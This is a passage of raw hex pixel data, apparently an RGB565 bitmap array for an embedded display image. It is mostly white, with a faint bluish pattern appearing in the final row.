0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffd, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffdf, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffde, 0xffde, 0xfffe, 0xfffe, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7fe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xfffe, 0xffdd, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xefff, 0xf7ff, 0xffff, 0xffff, 0xfffd, 0xfffd, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xffff, 0xfffe, 0xfffd, 0xffdd, 0xffbe, 0xffbf, 0xffbf, 0xffff, 0xffff, 0xffdf, 0xffff, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xfffd, 0xfffe, 0xffde, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffde, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffde, 0xfffe, 0xffff, 0xffff, 0xefff, 0xefff, 0xf7ff, 0xf7ff, 0xefff, 0xefff, 0xf7ff, 0xfffd, 0xfffd, 0xfffd, 0xffde, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff,
0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xf7ff, 0xf7fe, 0xffff, 0xf7df, 0xffff, 0xffff, 0xffbf, 0xffdd, 0xfffd, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xdfff, 0xc7bf, 0xaedf, 0x963d, 0x7d7b, 0x7d9a, 0x7559, 0x7d99, 0x8dfb, 0xaebe, 0xc73f, 0xd7df, 0xf7ff, 0xf7ff, 0xefff, 0xf7ff, 0xfffe, 0xffdf, 0xffdf, 0xffff, 0xfffe, 0xf7fe, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xf7df, 0xffff, 0xffde, 0xfffe, 0xffde, 0xffdf, 0xf7ff, 0xefff, 0xe7ff, 0xcfff, 0xb77e, 0x9ebc, 0x8e3b, 0x7dbc, 0x6d3b, 0x8579, 0x7dba, 0x8e5e, 0xa71f, 0xc79f, 0xe7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7ff, 0xf7fd, 0xfffe, 0xffff, 0xf7ff, 0xf7df, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xf7df, 0xffff, 0xffdf, 0xfffe, 0xfffe, 0xffff, 0xf7ff, 0xefff, 0xefff, 0xefff, 0xefff, 0xcfdf, 0xb73e, 0xa69d, 0x8e1c, 0x7d7b, 0x6d3a, 0x755b, 0x85dd, 0x967e, 0xaf1f, 0xcfdf, 0xe7ff, 0xf7ff, 0xffff, 0xffdf, 0xffdf, 0xff9d, 0xffde, 0xffff, 0xf7be, 0xffde, 0xffff, 0xf7df, 0xf7ff, 0xf7ff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffde, 0xffde, 0xffff, 0xffff, 0xf7ff, 0xffff, 0xfffe, 0xfffe, 0xf7df, 0xffff, 0xffff, 0xffdf, 0xffde, 0xffde, 0xffff, 0xf7ff, 0xf7ff, 0xdfff, 0xcfdf, 0xaf1f, 0x9ebd, 0x85fb, 0x7dba, 0x6d59, 0x6d79, 0x85fb, 0x9e7d, 0xb73f, 0xd7df, 0xe7ff, 0xefff, 0xf7ff, 0xffbe, 0xfffd, 0xfffd, 0xffde, 0xffdf, 0xffdf, 0xffdf, 0xffff, 0xfffd, 0xfffe, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffdf, 0xffdf, 0xffdf, 0xffbf, 0xffff, 0xf7ff, 0xe7ff, 0xe7ff, 0xdfff, 0xcfbf, 0xb73f, 0x965c, 0x85fb, 0x7d9a, 0x7599, 0x7d9a, 0x85da, 0x9e9d, 0xbf5f, 0xd7bf, 0xefff, 0xf7ff, 0xffff, 0xffdf, 0xffde, 0xffbe, 0xffff, 0xffdf, 0xffdf, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffdf, 0xffff, 0xffde, 0xffff, 0xffdf, 0xffdf, 0xffbf, 0xffde, 0xffde, 0xffbf, 0xf7df, 0xf7ff, 0xefff, 0xd7ff, 0xbf9f, 0x9ebe, 0x7e1d, 0x759b, 0x7d5a, 0x7d5a, 0x7ddb, 0x967d, 0xaf3f, 0xc79f, 0xe7ff, 0xe7ff, 0xefff, 0xf7ff, 0xfffe, 0xffbd, 0xffbd, 0xffff, 0xfffe, 0xfffe, 0xffde, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 